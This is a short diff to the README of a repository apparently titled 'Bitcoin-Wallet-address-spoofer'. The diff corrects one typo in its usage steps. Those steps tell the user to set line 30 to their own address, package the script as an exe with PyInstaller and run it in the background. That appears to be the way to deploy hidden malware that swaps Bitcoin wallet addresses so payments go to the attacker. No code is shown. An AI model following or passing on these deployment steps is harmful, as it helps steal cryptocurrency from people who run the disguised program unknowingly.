Ismael-Safadi/Bitcoin-Wallet-address-spoofer/README.md

 Usage
 =
-- You have to chenge line 30 to your address
+- You have to change line 30 to your address
 - convert script to exe file using Pyinstaller
 - run it into background